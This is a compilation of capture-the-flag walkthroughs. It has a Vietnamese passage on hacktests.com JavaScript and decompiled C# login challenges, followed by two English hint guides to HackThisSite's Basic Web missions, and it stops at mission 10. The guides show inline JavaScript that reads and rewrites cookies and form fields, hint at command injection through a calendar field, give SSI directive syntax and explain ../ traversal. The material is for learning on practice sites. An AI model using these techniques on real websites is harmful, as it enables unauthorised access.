Sau đó đổi Agent như thông tin trên và Refresh lại bạn sẽ nhìn thấy 1 hình ảnh ghi mật khẩu.

JavaScript 5:
View-source:http://254b96e1-d992-4b47-996e-80bbb7f13132.hacktests.com/Login.aspx

<script type="text/javascript" src="md5.js"></script>
<script type="text/javascript" src="script.js"></script>
script.js
e=prompt("Please enter username","");f=prompt("Please enter password","");
d=hex_md5(f);
if(e=='jack'&&d=='7b6835b9cd3667f365d2c25bf5261012')
{window.location.href=e+f.substr(0,1)+".aspx";}
else{alert("Wrong password or username");}

==> jack+<1 char>.aspx  –> Scan it !

C# application challanges
Vì đây là ứng dụng C# nên tôi sẽ trình bày cách đặc thù để vượt qua các ứng dụng kiểu này. Tuy nhiên có rât nhiều cách khác nữa, tôi sẽ trình bày ở các ví dụ khác.
Công cụ : .NET Reflector
http://www.aisto.com/roeder/dotnet/

Đây là công cụ tuyệt hảo để decode đối với các project viết trên .NET.

C# application challanges 1:
Dùng công cụ trên decode bạn sẽ nhận được đoạn code :

private static void Main()
        {
            Console.WriteLine("Please enter your username");
            string text = Console.ReadLine();
            Console.WriteLine("Please enter your password");
            string text2 = Console.ReadLine();
            if ((text == "bauer") && (text2 == "xxxxxxxxxxx"))
            {
                Uri requestUri = new Uri("http://ac61fd17-d9e3-427d-a3df-6ad2b882282d.hacktests.com/xxxxxxx.aspx");
                StreamReader reader = new StreamReader(WebRequest.CreateDefault(requestUri).GetResponse().GetResponseStream());
                Console.WriteLine("The level password is: " + new Guid(reader.ReadLine()));
                Console.ReadLine();
            }
            else
            {
                Console.WriteLine("Wrong username or password");
                Console.ReadLine();
            }
        }

Từ đó bạn sẽ nhận được GUID qua nhập user/pass ở trong đoạn code hoặc chạy link ở trên.

Ví dụ này cũng làm tương tự và bận nhận được đoạn code :

private static void Main()
        {
            Console.WriteLine("Enter username: ");
            string text = Console.ReadLine();
            Console.WriteLine("Enter password: ");
            string text2 = Console.ReadLine();
            string text3 = new StreamReader("users.txt").ReadLine();
            string text4 = text3.Split(new char[] { ':' })[0];
            string text5 = Encryption.Decrypt(text3.Split(new char[] { ':' })[1]);
            if ((text4 == text) && (text2 == text5))
            {
                Console.WriteLine("Your user is in the user database. please wait while you are being authenticated");
                string text6 = "?username=" + text4 + "&password=" + text5;
                Uri requestUri = new Uri("http://1260108b-6d0f-4c21-8ccc-1b6cda73065c.hacktests.com/Members/Answer.aspx" + text6);
                try
                {
                    Console.WriteLine(new StreamReader(WebRequest.CreateDefault(requestUri).GetResponse().GetResponseStream()).ReadToEnd());
                    Console.ReadLine();
                }
                catch (Exception exception)
                {
                    Console.WriteLine("An error occurred: " + exception.Message);
                    Console.ReadLine();
                }
            }
            else
            {
                Console.WriteLine("Your username and password did not match the one in the database");
                Console.ReadLine();
            }
        }

Cái này thì không đơn giản như cái trên, bạn cần chạy được hàm Encryption.Decrypt để có thể lấy được mật khẩu.
Vì mật khẩu được mã hóa trong file users.txt
Hanson:AZ1LmvbIFOlxspz9+8EsrG8T5ENoa8XY1LVJ92nimvk=
Đây là kết quả :

Basic Web Guide
Version 2.2
July 4th 2007

Table Of Contents

• Introduction
• Common Errors and Problems with Basic Missions
• Before you Begin
• Basic Mission 1
• Basic Mission 2
• Basic Mission 3
• Basic Mission 4
• Basic Mission 5
• Basic Mission 6
• Basic Mission 7
• Basic Mission 8
• Basic Mission 9
• Basic Mission 10
• Conclusion

Introduction

For those of you that have questions after reading this, or before reading this (if they are specific) please do post them. We will gladly help you out. This guide is simply meant to help those who need a little bit of help on the missions, without the use of spoilers.

Remember, when posting a question, please make the thread title specific, and give a good description of your problem. And please please please write in proper English. Its really not that hard. You will get much faster and friendlier answers by doing so. And as always, do tell us what you’ve tried, and what was the outcome of your attempts.

Of course, I am not the expert. Just a local HTS member that spends too much time in these forums. This one especially. For those of you who have read my article on basic missions 1 to 3, this guide is intended to replace it. I prefer posting a thread – and hoping it will get sticky’d – then to release another article. Since I have freedom of BB codes here, and its much easier for replies to be made, and for others to refer to this post. ed note: buz originally pinned this topic in HTSv2 and since then, it has become an integral part of the HTS Basic Web Missions

Common Errors and Problems with Basic Missions

Hackthissite.org has a few problems with the basic missions that should be mentioned beforehand, as it might help solve that question you have.

The first thing you may ask is why do you always have to redo the missions you’ve previously completed every time you log back in. Well the answer is, you don’t. You can easily skip the missions you’ve completed by changing the URL to jump to the last mission you completed. This will not, however, allow you to skip ahead of missions you’ve not yet completed. Doing so will present you with a password box for the current mission you are on, and wont give you the mission details and information you need to complete the mission.

Basic Mission 1
Sometimes the source code doesn’t appear. All you get is an empty notepad page. To resolve this, close notepad and your web browser, and try again. As far as I am aware, this only occurs on mission 1.

Basic Mission 2
In mission 2, instead of displaying an ‘Incorrect password’ warning, all you receive is a blank page. Anytime you see this – in any level – this means the password is incorrect.

Basic Mission 4
When trying to send the email are you getting an error saying that you’re banned due to spamming? This is because the HTS mail server does actually send emails and the script could be tricked to send emails to an arbitrary address (in fact this is what you’re doing). Without this restriction the script would be used to mail bomb someone. The ban will automatically be lifted in 15 minutes or so. Have a short brake. ed note: Paragraph borrowed from Sid

Basic Mission 4/5
For those of you with hotmail.com accounts, for mission 4 and mission 5, you will receive the email in your junk folder. The email is from ‘Sam’ and has a single sentence containing the password. For those with gmail.com accounts, 99% of the time, you will receive an ‘IP/email address banned for flooding’ error. This doesn’t really ban you, so just go back and try a non-gmail account if you have one. I know you have one, seeing as the only way to obtain a gmail account is through invite.

As well, if you have a software firewall, you might experience difficulties with mission 5, receiving “invalid referrer” errors even after you have entered the correct Javascript code. To solve this, disable your firewall temporarily.

Basic Mission 7
The command ‘dir’ should also work however, in this mission, it does not.

If you have any other errors you would like to report, simply PM me and I will check it out.

Before you Begin

Most of HTS’s missions are based on internet hacking. So you don’t need a very profound knowledge of computers. You do need, however, knowledge on internet and networking. Seeing as the internet is just a collection of millions of networks, books about internet and networking go hand in hand.

Before you even attempt mission 1, there are a few things you need to know. The essential being HTML. No you do not need to be an expert in HTML, but you need to know the basics of HTML. For example, some of the codes, how to edit and create HTML documents. And how to view the HTML source code of a webpage.

w3schools.com can provide some good information on HTML, as well as other web related topics.

If your goal is simply to get by the HTS hacking missions, your knowledge need only be as far as internet and networking, as I mentioned above. But the world of hacking extends far beyond the internet. Hacking extends to computers that are not part of the internet, or simply hacking someone’s personal computer. Although at this stage it is more for the purpose of stealing and causing damage, it is none the less, part of hacking. For this you should also have a decent grasp on general computing knowledge, such as hardware and software, operating systems, domains and trusts, policies and permissions, and much more. Again, you don’t have to be an expert, but you would have to become one. I will leave this as is, because I am straying away from the objective of this guide, getting by the basic web hacking missions. For more information about beginning hacking in general, read this article. Ed note: This article was a mini “guide” to starting your hacking career which contained many references to books and web links. This thread was lost when forums.HTS moved and became CS.net

Ok, now onto the missions!

Basic Mission 1
Knowledge required:
- basic HTML

Sam, the network security agent at some random company has created a password for users to access information on the company’s website. This is made to prevent just anyone from accessing the site. Only those who know the password can enter. But Sam is fresh out of tech school and doesn’t have any experience. So he’s made a grave error in the way he handled the implementation of the password.

Basic Mission 1 is called the idiot test. Simply put, if you cannot beat it on your own, don’t worry, I came to the forums looking for help too. Although I knew how to finish the mission, I just wasn’t thinking the right way. This is something you will learn in these missions, its not just what you know, but what you do with that knowledge. Sometimes all you need is a push in the right direction.

If you’ve ever created a webpage on Angelfire or Geocities, then you know how to finish this mission. You just need that “push in the right direction”. If you haven’t, then thats ok. Sam made an error when he created the password feature. We have to find that error. The first place to start looking for would be in his code. Perhaps he left us a clue there.

NOTE: If you still don’t know how to beat this mission, I strongly suggest reading up on some basic computing and basic internet. Books such as those I mentioned in this article. Ed note: This is the same link as previous. To fully understand and enjoy this mission, I suggest you do sign up for a domain at Angelfire or Geocities and experiment with some HTML.

Basic Mission 2
Knowledge required:
- basic HTML
- ability to think logically

Sam has gotten a tad smarter. Experience always comes from experience is what I say. Sam decided to create a text file with the password in it. So that the edit box will read from that file, and match what you typed in to that password stored in the file. There’s only one problem. Sam forgot to upload the file. So then, the edit box will be comparing the password to nothing.

For those seeking a better understanding. Look at this:
(IMG:http://img.photobucket.com/albums/v637/WildCard832/level2.jpg)

One thing I always try and do is submit the password field blank to see what kind of error message it will give.

Basic Mission 3
knowledge required:
- decent amount of HTML

Ok, same concept as basic mission 2. Except this time, Sam remembered to upload the password file. The corporation he’s working for should fire him. Poor Sam. Ok, so we know the edit box will compare what you type to the password file. So this means that the edit box must know the location of the password file. So lets see if we can find out were that is.

Again, a pretty diagram:
(IMG:http://img.photobucket.com/albums/v637/WildCard832/level3.jpg)

Basic Mission 4
knowledge required:
- decent amount of HTML
- directory structure

This time around, Sam decided to make use of a little bit of programming in his attempt to keep hackers at bay. He created a little script that would send himself the password in case he ever forgot it. You see, Sam is the type of guy that goes to the grocery store with a paper list of items to buy since he cant remember what his wife told him before he walked out the door some 20 minutes ago. (Little bit of humour)

So not only is Sam a poor network security technician, but he’s also got a bad memory. I have to wonder how he got hired sometimes.. Lucky for us, Sam left us a nice big (sorry, its not red) button for us to press to send Sam the email to his account.

We can get the password if we hacked into Sam’s email account. So we need to know his username, domain name, and password. A quick look at the source will reveal to us his email address, which contains his username and domain name (username@domainname.com). Now we just need to figure out his password. But there’s a problem. If we hack into his email, he’ll know someone got his password, and we don’t want that. And on top of that, we don’t know his email password. So thats even more trouble. But we like to keep things simple.

Do you have an email account? Hopefully, you answered yes. (If you answered no, you need help) Now, lucky for you Im assuming you know the password to your email account too right? Yes you do.

Need I say more on this? No.

Now as for directory structure, you cannot move the location of a webpage and expect it to still refer to the real pages at the original location. Its like if you made a shortcut to a game, and then changed the location of the original file. The shortcut would no longer work. The real terms for this are called absolute path and relative path. You can easily google those terms for extra help.

Here is an example:
(IMG:http://img.photobucket.com/albums/v637/WildCard832/HTTPchart.jpg)

This part is always so hard to explain yet so simple to understand. The keywords to remember; Absolute path, and relative path.

Basic Mission 5
knowledge required:
- decent amount of HTML
- basic understanding of how information moves around the internet
- basic Javascript
- Javascript Injections

Ok, so Sam has gotten smarter yet again. (And so have you!) He modified his level 4 password script to make it a little more secure. This is why IT technicians get paid the big bucks. To stay one step ahead of hackers. But your job as a hacker, is to find vulnerabilities, learn them, and exploit them. Maybe Sam should get a raise now.

For those who have read my previous article, I list several books which I have read. One of which, is ‘How Computers Work: Millennium Edition’ by Ron White. If you turn to page 342, you’ll see a nice diagram of how network communications work. I have re-created a diagram to explain this for our situation in level 5.

When you send data over the internet (or any form of network, local or otherwise) your computer sends two major pieces of information. The header and the data. The header contains two important values. A “to” value and a “from” value. The “to” value indicates who the information is addressed to. If you wanted to go to Google’s website, the “to” value would be http://www.google.com. The “from” value contains two pieces of information. The first is what computer is sending the information, so in this case, Pilot’s computer, and the second, is the type of web browser, and current URL address of my browser. So if I was on HTS’s webpage, it would be http://hackthissite.org. Just like on a birthday card! To: From:

So our header is launched towards Google’s homepage. From there, Google knows who to send it’s information back to, because of the “from” value in the header. Google’s header would have a “to” value of Pilot’s computer and a “from” value of http://www.google.com.

Ok, so now that we know what a header is, the second part is the data. This is what you are sending. If you typed into your URL address bar Google’s website, then the data would be a request to see the webpage. Google’s data in return would be it’s homepage so that it can be displayed on your browser. Thats how computers communicate over networks, local, and wide.

Back to level 5. What did Sam do to make his level 4 password page more secure? He created what is called a referrer. A simple piece of code in the webpage’s PHP that tells the server that if the webpage comes from a certain address, then it can send the email to whatever address is in the HTML code on the webpage. If the referrer doesn’t match the information in the header, then Sam’s server will return an error message.
(IMG:http://img.photobucket.com/albums/v637/WildCard832/level5.jpg)

In level 4, to change the email address, you had to save the source code onto your computer, thus changing the “from” value in the header. But in level 5, this will result in an ‘invalid referrer’ error. So we need a way to change the contents of the webpage without saving the source to our computer. In comes Javascript. An internet programming language on the client side of a webpage. Client side meaning that it modifies the webpage on your computer. Not on Sam’s server.

So using Javascript, we need to change Sam’s email to our own email. That way, we wont tip off Sam’s referrer because the page is still being executed from the same location, and we’ll be able to receive Sam’s password.

*New* If you want to gain a little more experience with Javascript, I suggest you look over the missions here. (Ed note: This link seems to be down, I will try fix this) If you can manage to get up to mission 10 (I think) then you are good to go. Although you don’t have to, the first few missions will give you a general idea of what Javascript is.

For more information, you can read the Javascript injection article. However I must point out it contains spoilers. It contains the exact Javascript code you must use. Don’t say I didn’t warn you. Here it is.

Basic Mission 6
knowledge required:
- ASCII
- pattern recognition (logic)

Sam is getting smarter and smarter. But so are you. For every wall he builds, you successfully climb over it. Sam has yet again decided to take a new approach to his password protection. Not with HTML, not with Javascript, but with encryption. He created an encoder that would encrypt his password. This way, if he ever forgot the password, all he would need was the encrypted password and he would decode it using his decoder (which we don’t have access to)

However, we did manage to acquire his encrypted password. Even more lucky for us, we found his encryption program too. However, it is not a decoder. It is an encoder. So we cannot simply put in his encrypted password and get his real password. But perhaps there is another way…

For those of you who like math, simply think of this equation: A+2=4. The method used to solve that equation is the same you would use to solve this encryption problem.
Basic Mission 7
knowledge required:
- basic Linux (or *nix Operating System) is optional
- experience using MS-DOS is optional
- UNIX commands
- directory structure

As I said earlier, Sam is a graduate from tech school. While he might still be new to the security scene, he still has some other valuable knowledge. And he has begun to use it. Most of us are running Windows on our computer. On Sam’s server, this is not the case. We don’t know exactly what Operating System he is using, but we know it is a *nix OS and that both Linux and UNIX operate on UNIX commands.

When I say they operate on UNIX commands, think of it like MS-DOS. (Just as extra knowledge, MS-DOS stands for Microsoft Disk Operating System) DOS is the actual Operating System of Windows 3.x, Windows 95/98 and Windows ME. Those Windows are simply Graphical User Interfaces (GUIs) to DOS. Since DOS is not GUI, it isn’t as user friendly as Windows. But those versions of Windows cannot exist without DOS.

Now in DOS you can do magical things. You can copy folders and file from one place to the next, you can view the contents of a directory (AKA folder in Windows terms) you can change directory, and you can format your drive (don’t do that though). You can also do plenty of other things, but that is straying away from the goal of this mission.

In a *nix Operating System (*nix meaning either UNIX or Linux) they have their equivalent to MS-DOS called the console or shell. The console resembles DOS and uses many of the same commands. But it also has some of its own commands that DOS does not recognise, in fact, many.

Now, why is this important to the mission you might ask. Well, simple. If you remember back to level 5, Sam used PHP (PHP Hypertext Pre-processor) to execute a script on the server-side (meaning on his server) and then send out the page to your computer (the client) with a referrer. The referrer was in fact a PHP command that was executed before the page was sent out to you.

In mission 7, Sam again uses PHP. This time, the script launches a query to you. It is asking you to input a year so that it may display a calendar. What is in fact happening is that the page is attaching whatever you enter into the edit box to a UNIX command and sending that back to Sam’s server to be processed. After that, it will return to you with the calendar for the year you entered, in other words, the result or output of that command.

Now this is where having experience with both MS-DOS and Linux (or UNIX) helps. If you have experience in DOS, you understand how this type of problem is handled. If you have Linux or UNIX, you can in fact try out the UNIX command for displaying a calendar.

Here is how the calendar command works.
(IMG:http://img.photobucket.com/albums/v637/WildCard832/level7.jpg)

The command cal can be used with a year value just like you are required to use, or it can be left alone, and then it will return a calendar for the current year and month. There is, however, one problem that Sam didn’t address. The word ‘cal’ is only the first part of the command. What you are typing in the edit box is also part of the command. Meaning you are typing a UNIX command that will be executed on Sam’s server. Aha! Now we know how to exploit mission 7.

Onto the problem. Sam has hidden the file in an ‘obscurely named file saved in this very directory’ to quote the mission statement. What does obscurely mean? Well a quick search of dictionary.com revealed this:

QUOTE

Not readily noticed or seen

So that means Sam didn’t save the password to password.php like he did in level 3. So don’t think you can guess the webpage that the password is located in.

But we also know that the password file is located in missions/basic/7 directory. So we have access to a UNIX console where we can input commands, and we have the directory where the password file is located. And lucky for us, that directory is the current directory. Meaning the directory we are on. So we wont have to change directory. So why don’t we try and find a way to see what is contained inside the missions/basic/7 directory.

Basic Mission 8
knowledge required:
- Server Side Includes (SSI) language
- basic programming knowledge, optional

Sam took a different approach this time. He still put the password on his server. Now, since he was using UNIX last time, it’s safe to assume he hasn’t changed.

The problem now is this. In mission 7, a PHP script was called that would execute a UNIX command on Sam’s computer. The first part of the command was already entered, cal. The second part of the command was the year which you entered. Well, were supposed to enter. But we exploited his script to our advantage by executing our own code.

In mission 8 however, Sam’s PHP script doesn’t execute a UNIX command. In fact, there seems to be no way for Sam to have access to the password himself (I guess HTS forgot about that part) He did, however, upload a PHP script that his daughter wrote. A simple script that inputs your name into a string variable and then counts the numbers of characters and stores that in a integer variable. Then a page is created in a directory called /tmp which stores .shtml files (Scripted HyperText Markup Language) These files use Server Side Includes to change the contents of the page to include your name and the number of characters in your name.

Basic Mission 9
knowledge required:
- Server Side Includes (SSI) language
- ability to think logically

Sam hasn’t learned a thing between mission 8 and mission 9. How did you get the password in mission 8? Well, think. How will you get the password to mission 9?

Although this mission is extremely easy, I feel it is also very important. Even I learned something out of it.

Basic Mission 10
knowledge required:
- Javascript
- what are cookies and how they work

Internet cookies are simple files that a website saves onto your computer when you visit the site. This is so the next time you visit the website, it will remember who you are. The most common example of this is on websites that require a username and password, such as HTS, Myspace, ImageShack, Hotmail (and every other email site). They will store a cookie on your computer so that the next time you visit the site, you don’t have to re-enter your username and password. That is how the little checkbox “remember me?” works.
(IMG:http://img.photobucket.com/albums/v637/WildCard832/level10.jpg)

However, don’t confuse this with Windows’s username and password saving feature. When you type in a new username and password to a website, Windows offers to remember it. This way, when you type the username, it will automatically add the password for you. This is not related to cookies.

Ok, now that we know a little bit about cookies, lets work on the mission. Sam, in his final attempt to keep you out of his site, has turned to using cookies. No more hidden password files to worry about. Unfortunately, Sam’s cookie is not stored permanently on our computer, so we cant go out looking for a file and changing it. So then, how do we change something if there is no file to edit. HTML? Good try, but no. HTML is the source of the webpage. Cookies are not part of the actual webpage. So how do we change the value of the cookie? Javascript you say? Yes!

Remember back in mission 5 how we used Javascript to modify the email value on the webpage so that we could receive the password? We used Javascript. Well, now we need to change the value of a cookie so we can have access to Sam’s site.

In using this method, Sam made it easy for his employers to access the website, and difficult for hackers to get in. Sam’s employers have an ability that Sam doesn’t have. The ability to remember their damn passwords!! So they need only enter it into the password box and then get into the site, skipping the whole cookie process. However, if the password is entered incorrectly, they are sent to another page where a cookie is created so the site remembers they no longer are authorized to the site. Unless they go back and enter the right password.

Onto the objectives. Forget about the password. A hacker always finds the easiest way into something. Just like in mission 4. You chose to have the password sent to your email rather than try and get into Sam’s email account. Now in mission 10 you’ll choose to modify the cookie to accept you rather than try and guess the password.

I will give you one hint however, this is your choice to view it or not. However even if you do view it, it wont give the answer away. This Javascript command could prove useful:

» Click to show Spoiler – click again to hide… «

java script:alert(document.cookie);

ed note: Spoiler tag is now working

Conclusion

I hope this has provided you with that “first step in the right direction” without giving too much away. If you have read this, and still cannot continue, please feel free to post in this forum. We are here to help you. Don’t feel stupid even if the question is “I’ve read the Basic Web Guide and still don’t get level 1″ Trust me, there are others that are in the same situation as yourself.

Now that I have beaten all the missions, mission objectives will be posted soon for the remaining missions (8 and 10). Look out for those.

Happy learning,

Pilot

Table of Contents:
1.) What you will learn.
2.) Introduction.
3.) Basic 1
4.) Basic 2
5.) Basic 3
6.) Basic 4
7.) Basic 5
8.) Basic 6
9.) Basic 7
10.) Basic 8
11.) Basic 9
12.) Basic 10
13.) Description that faith removed because it was too long.

1.) What you will learn.

A.) A better understanding of HTML.
B.) A basic understanding of PHP.
C.) Completion of the basic missions.
D.) Plus more!! (not going to put all of this into detail ).

2.) Introduction.
If you are reading this I just want to say thanks because I am still a new member of this site and I am loving every moment of it. I would also like to state that this is my first tutorial and I would love if you would post comments about it and give me some feedback so I can improve on the next one I might consider making in the future if this one turns out good. So please read carefully and I hope I made it as clear as I can. If you ever have any questions please do not hesitate to PM here on hackthissite.org . Also please note that this might be a spoiler but I tried my best not to make it one.

3.) Basic 1:
Requirements:
A. Very basic knowledge of HTML
B. ability to READ

Okay as you read this is very simple. It is so simple you are going to smack yourself in the face and be like wtf?!?! To how stupid and easy this is. Okay first thing is first. It does not matter if you’re on firefox or IE your browser will be work on this one. Either right click and click on view source/view page source or click on view and then source/page source. There is actually where some people screw up. You need to look through the HTML coding carefully until you hit a comment tag, go to w3school if you don’t know what that is. Comment tags will not show up as text nor be executed. If you didn’t know what I was talking about- and there should be something there to help you within the source of the page . Good luck! XD
FEdited out major spoilers ;]
4.) Basic 2:
Requirements:
A. Really nothing is required besides what it says… COMMONSENSE.

When I first tried this I thought there was a catch to it because it seemed way too easy. Well there is no catch XD. Ok please pay a large amount of attention to this quote taking directly from Basic 2 mission. “However, he neglected to upload the password file…” Now read it a few times. This should be enough to get you to realize that he forgot to do something (duh). So try a few things on the password thing with that statement in mind. Okay, so enough said on that I am going to end Basic 2.
FNote: Basically, the script tells the password to compare the password hosted password.
As long as they are the same, it should let you through. Now think, if it’s not uploaded, it’s comparing to null, or nothing…

5.) Basic 3:
Requirements:
A. basic knowledge of HTML if not able to read and understand it

Okay, this one is yet again very easy to figure out. Now from the information they give us about our mission. Sam has the password in a file somewhere on their server. Now that we know that high amount of information this gives us a very distinct clue. We need to know figure out where the password file is. Seeing that you hopefully know the basics of HTML, you must know that the form or the password field has to lead to somewhere or in other words it has a location within the form coding to pin point the location of the password. So just go into the source of the page. Find where the form is and look for the file and your on your own from here LOL it is kind of simple and common sense.
FNOTE: This goes to what I was saying on the mission above, now it’s checking for the password at the right location, again, our handy commonsense comes into play…

6.) Basic 4:
Requirements:
A. little bit more than basic knowledge of HTML but this is still a little basic. But I recommend reading up on HTML anyway from http://www.w3schools.com, it has helped me out a lot in being a webmaster and coding my own website
B. I also recommend using Firefox for this one because there is a bug for when you go to send an email to your account instead it will just give you the password. It saves a lot of time.

The first thing I want to say is congrats on completing that last level lol. Okay, now that that is over, time to get back the tutorial. Okay this is getting a bit more into being able to change simple thing in a form within an HTML document. Now yet again go to the source of the HTML document and yet again get to where your mission is. Okay once you find it, there will be two forms. One is for sending the password to your email and the other one is for entering the password. Look at the form that has to do with sending the password to your email. Know copy the first form and paste it into a blank notepad. Now here is where editing is needed. Ok where it says <form action=”/missions/basic/4/level4.php” notice that the form action points to a subdirectory. Now I hope you know that you will have to change this because you do not have any of these files on your computer. So you will have to obviously change this. So how do we get it to link to HTS? Now that you have that done. Change the email to yours, and then save it as an HTML document by just adding the .html at the end of the name of the document and save it to your desktop so it is easier to get to. Now like I said before I recommend you use Firefox due to the bug so you will not have to do more work than you already have to. I think you can finish the rest. It would be kind of pointless to tell you because it would spoil it even more than I already did.
FNOTE: Edit out spoilers, minor typo, random lol and zomgs. And here’s the theory of this mission:
Basically, what you did up there is reproducing a webpage above, and then exploits it. That’s really a big fuss to do for me. That is, if you know (*faith checks for Silent-Shadow* >.>) inline JavaScript. You’d run into it later, this level is extremely simple with inline JavaScript, great article here.
http://www.hackthissite.org/articles/read/405
http://www.hackthissite.org/articles/read/170
*the Silent-Shadow is the admin of our site. Last time I misused the term, she tripped. (Really hard)

7.) Basic 5:
Requirements:
A. some knowledge of Inline Javascript (I will teach you a little bit about it in this section)
FNOTE: oh, wow, just what I was talking about

The first thing you are going to notice about this mission is that it looks a hell of a lot like the last one. It does have similarities but the security is a lot better so now we need to prove to poor Sam that he still needs to work on it. The most difficult part in this one is to get the right Inline Javascript code to put into the URL bar. The following are Inline Javascript you will need for this. The first one: alert. When you use alert in the Inline Javascript, it will then show a small pop up showing you what you wanted.
Ex. 1.) javascript:alert(“Hello World!!”); When you type this, there will be a small pop up on your screen that says Hello World!! Now you can also add things to it like if you want to see the cookie on the page.
Ex 2.) javascript:alert(document.cookie); Now another thing you can do is change things like the cookie by well using Inline Javascript.
Ex 3.) javascript:void(document.cookie=”something new”); This would change the current cookie to something new. You can also do things like that with a form that is embeded into the HTML document.
Ex. 4.) javascript:void(document.forms[number of form you want to change starting from 0].to.value=”what the value is”); Now that you know some of the basic Inline Javascript, try a few things out. I will give you a little hint though, you will have to add two of them together like this: javascript:void(document.cookie=”something new”);alert(document.cookie); So good luck
FNOTE: Great explaining, used javascript injection about 7 or 8 times there… I had to fix it, so silent doesn’t kill you while you’re asleep. It’s called Inline Javascript. And I’ve fixed your fail at typing “=” when there should be “.”
However, what you didn’t explain was how to change forms.
This is your everyday inline. Javascript:void(document.forms[0].name.value=” “)
Javascript:void(document.forms <- this tells us it’s forms that we’re going to modify
.name <- this is the name of the field surprisingly enough! View source, and if you see name=”cookiejar”. Put cookiejar where name is so it becomes .cookiejar
.value <- this is where the value is, wow~ no tricks to it at all! If it says on the source value=”empty”, and we want it to be full, make change it to be full, so we have .full
After all that, we could have this as our result of our inline javascript to put in the url bar.
Javascript:void(document.forms[0].cookiejar.value=”full “)
Still confused? Pm liuyuan or jump on #help on irc.

8.) Basic 6
Requirements:
A. knowledge of some general cryptography would be helpful according to hackthissite.org but I used a different method

Wow, ha.. Ha.. Sam isn’t as retarded as I thought he was. Well since Sam is really starting to pick up on his coding skills, we will too. So as we look at it you will tend to scratch your head and be like wtf? But this is normal. Once I break it down for you, you will be like OMG, awesome I love you. So here we go!(yes I know lame but w/e) Okay er figured out that his encrypted password is bdd8hgg: so we will have to use this… But what do we do with it. I know know your first thought as it was mine, “Wait!! I will try this as the password.” Then, “Well now that was a complete failure, let’s try the encryption thing good ol’ Sam set up for meh.” Well that isn’t the right answer either. Now the encryption thing he set up was to just confuse the hell out of us. Since the password is encrypted, we will have to do the opposite to it, Decrypt it. (Notice the DE… Key word.) Now the only way to do that is to understand how the encryption works and its pattern. Try using the letter a. Use 8 a’s so you will be able to figure out what you will need for each letter. After that you will notice it becomes abcdefgh. So it is 0, 1, 2, 3, 4, 5, 6, and 7. Now that you know that you will know how to decrypt it. So instead of going forward with the letter u will have to go backwards. But wait, you have!?!?!? Well fortunate for you I am going to give you a big clue that might be a spoiler so I will tell you the hint and I will set the spoiler at the bottom of this section. Well the password is ASCII. Now with that knowledge just look up some information on it and then you should know what you have to do from here.
WARNING: SPOILER BELOW
WARNING: SPOILER BELOW
WARNING: SPOILER BELOW
WARNING: SPOILER BELOW (Fnote: geeze, omg, we get it <.<)
Okay here is the spoiler. This is the link to an image that shows all of the ASCII characters so you will be able to decrypt the encrypted password. http://en.wikipedia.org/wiki/Image:ASCII_full.svg
WARNING: SPOILER ABOVE ^
FNOTE: Fixed minor typo, great explaining, this is called ASCII shifting btw. Great job on this section, I couldn’t have explained it better myself. *gives cookies*

9.) Basic 7
Requirements:
A. very little knowledge of UNIX commands

Okay Sam has been upgrading his equipment and techniques. From what he said the cal command is being operated from UNIX. So that means trouble for us. But once you learn a few commands that you will see here in this section this will be a piece of cake. Now since it is being run from a UNIX server and we have full access to it and are able to put in commands we are able to put in our own commands in order to change the information and hopefully figure out how to get the password. Hackthissite.org was nice enough to give us a HUGE tip in saying the file is in the main directory so we will not have to fool around directory switching. So this makes it so much easier to do!
FNOTE: From this part, I’d have to disagree. Please see my note.
Okay here are a few basic commands you will need for this in no particular order. First off is the command for getting into the main directory. The command is simply / so in the form where you enter the year you want just put / and you can see the directory. Now here is another very useful command that allows you to make your own command over the one that was programmed. The cal command has been programmed so you can’t just put any command in. The command is *spoiler removed* so just type it in the field and you are then able to change the command. Now the final command I am going to tell you is how to view the directory. The / command was not the command to view but to get to it… I think LOL… So if I am wrong please tell me I would appreciate that. Now the command is *spoiler removed*. So now that you have the proper tools, I will let you handle this on your own. If I tell you what to do it will be a big spoiler. But the rest is practically common sense so have fun and goodluck!!
Okay, interesting theory there, but unfortunately, it’s wrong. *see below*
FNOTE: fixed minor typo, grammar error, repeated “the” for 3 times. Programmed is spelled with double m. =]
Hmm I wouldn’t have agreed without on this one, the years aren’t stored in a directory, this is a perl calculator. It calculates the years and date and everything. Don’t believe me? Save the .pl file, open it with notepad. It should gives you something like print ‘cal $year’; or something similar.
Now, only if we know how to start a new command, there are two ways, now google.
While you’re at it, google the dir command on a unix box.

10.) Basic 8
Requirements:
A. an understanding of SHTML or you can go here: http://httpd.apache.org/docs/1.3/howto/ssi.html
B. ability to copy and paste

Okay now his daughter wants to get involved in his programming. -.- Well we will just have to find the loop hole in here scripting. Okay after we put in our name in the text field, we notice that the page the results come on is an SHTML file. Hmmm… I do not know too much about this. If you are like me I recommend going to http://httpd.apache.org/docs/1.3/howto/ssi.html and reading up on it. After reading that and almost falling asleep I realize that with that bit of information, it shows you how to execute a command within the SHTML text field. Now there is one thing they didn’t show you, it is how to go up a directory. The command for that is .. and I would also like to point out that I was using Firefox for this so the command ‘cd’ or change directory would not work. After I tried it on IE I notice it doesn’t work either. I would also like to remind you like from the previous mission, the server is UNIX so you can’t use the windows command. So use the command *spoiler removed* to show the directory. But I will give you a hint. Unlike the other mission, you can’t just type the commands you need to enter a piece of coding that you find at http://httpd.apache.org/docs/1.3/howto/ssi.html which I have been pointing to this whole section of the tutorial… So yea, good luck lol!!
FNOTE: fixed the usual stuff.
Alright, SSI is a technology that allows execution of server-side commands on the processing of files… Hmm…
<!–#command attribute=”value”–>
That’s enough hints, remind you about directory transversal tho.
. current directory
.. go back a directory

11.) Basic 9
Requirements:
A. basic knowledge of UNIX commands
B. bit of understanding of SHTML

Okay as you notice this missions talks about the last mission. This gives you a bigger hint than you think. It actually says that Sam screwed up. It says that you can get to the level 9’s password in the /var/www/hackthissite.org/html/missions/basic/9 directory. But we cannot access this in level 9. We will have to go back to Basic 8 in order to complete this level. So once your there use some of the information you have gained from the last mission to type in the command to get to the directory. But what you must know is how to change directory. But this time you are going to have to go down a directory. But it will actually be two because you are on the /basic/8/tmp/ directory. What you want is to get to the /basic/9/ directory. Now this is where a lot of people get confused over. The command for going back a directory is ../ So if it requires two you will have to use two of those, because you’re really going up two directories. What really messes people up about this is there no space between the two commands. Please remember that you also have to point the command to the proper directory or the correct level so it can work. If you don’t you will get an error. So I have given you either enough information or too much and some of the more experienced people might get pissed at me for revealing too much information LOL so good luck!!
FNOTE: Hmm, great guide. You did reveal too much information, but you explained it over, so great job. (Also added minor explaining)

12.) Basic 10
Requirements:
A. some Inline Javascript knowledge needed
B. yet again more common sense

